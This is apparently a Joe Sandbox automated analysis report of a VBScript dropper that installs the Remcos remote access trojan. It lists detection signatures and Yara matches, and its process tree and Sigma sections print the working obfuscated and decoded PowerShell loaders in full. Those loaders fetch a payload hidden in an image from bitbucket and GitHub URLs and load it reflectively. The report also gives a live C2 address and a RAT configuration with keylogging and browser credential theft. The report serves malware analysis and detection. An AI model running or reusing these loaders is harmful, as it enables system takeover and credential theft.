Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
scan_doc20241024.vbs

Overview

General Information

Sample name:scan_doc20241024.vbs
Analysis ID:1540845
MD5:87e9c9fa5b677d82e0eba303bfee0768
SHA1:26c03786558062484c7f275afedea681494c8b7f
SHA256:af2848711b8c1b41a6315cd18c52158f1c080f462c3d100df9670f5df265daf0
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3308 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#FM#bQBu#Gk#aQBG#Ek#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GE#bgBu#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 4512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["154.216.18.51:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JX5AIB", "Keylog flag": "", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x59618:$str_b2: Executing file:
      • 0x5a01c:$str_b3: GetDirectListeningPort
      • 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x59bb8:$str_b7: \update.vbs
      • 0x59644:$str_b9: Downloaded file:
      • 0x59630:$str_b10: Downloading file:
      • 0x596d4:$str_b12: Failed to upload file:
      • 0x59fe4:$str_b13: StartForward
      • 0x5a004:$str_b14: StopForward
      • 0x59b10:$str_b15: fso.DeleteFile "
      • 0x59aa4:$str_b16: On Error Resume Next
      • 0x59b40:$str_b17: fso.DeleteFolder "
      • 0x596c4:$str_b18: Uploaded file:
      • 0x59684:$str_b19: Unable to delete:
      • 0x59ad8:$str_b20: while fso.FileExists("
      • 0x59871:$str_c0: [Firefox StoredLogins not found]
      • 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!]
      • 0x59781:$str_c3: [Chrome StoredLogins not found]
      • 0x59898:$str_c6: \logins.json
      00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Process Memory Space: powershell.exe PID: 4872JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          13.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            13.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x59618:$str_b2: Executing file:
            • 0x5a01c:$str_b3: GetDirectListeningPort
            • 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x59bb8:$str_b7: \update.vbs
            • 0x59644:$str_b9: Downloaded file:
            • 0x59630:$str_b10: Downloading file:
            • 0x596d4:$str_b12: Failed to upload file:
            • 0x59fe4:$str_b13: StartForward
            • 0x5a004:$str_b14: StopForward
            • 0x59b10:$str_b15: fso.DeleteFile "
            • 0x59aa4:$str_b16: On Error Resume Next
            • 0x59b40:$str_b17: fso.DeleteFolder "
            • 0x596c4:$str_b18: Uploaded file:
            • 0x59684:$str_b19: Unable to delete:
            • 0x59ad8:$str_b20: while fso.FileExists("
            • 0x59871:$str_c0: [Firefox StoredLogins not found]
            • 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!]
            • 0x59781:$str_c3: [Chrome StoredLogins not found]
            • 0x59898:$str_c6: \logins.json
            13.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              13.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
              • 0x58338:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x58848:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x58218:$str_b2: Executing file:
              • 0x58c1c:$str_b3: GetDirectListeningPort
              • 0x58638:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x587b8:$str_b7: \update.vbs
              • 0x58244:$str_b9: Downloaded file:
              • 0x58230:$str_b10: Downloading file:
              • 0x582d4:$str_b12: Failed to upload file:
              • 0x58be4:$str_b13: StartForward
              • 0x58c04:$str_b14: StopForward
              • 0x58710:$str_b15: fso.DeleteFile "
              • 0x586a4:$str_b16: On Error Resume Next
              • 0x58740:$str_b17: fso.DeleteFolder "
              • 0x582c4:$str_b18: Uploaded file:
              • 0x58284:$str_b19: Unable to delete:
              • 0x586d8:$str_b20: while fso.FileExists("
              • 0x58471:$str_c0: [Firefox StoredLogins not found]
              • 0x583a5:$str_c2: [Chrome StoredLogins found, cleared!]
              • 0x58381:$str_c3: [Chrome StoredLogins not found]
              • 0x58498:$str_c6: \logins.json
              6.2.powershell.exe.1cfdff3d3c8.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                SourceRuleDescriptionAuthorStrings
                amsi64_8.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Spreading

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T
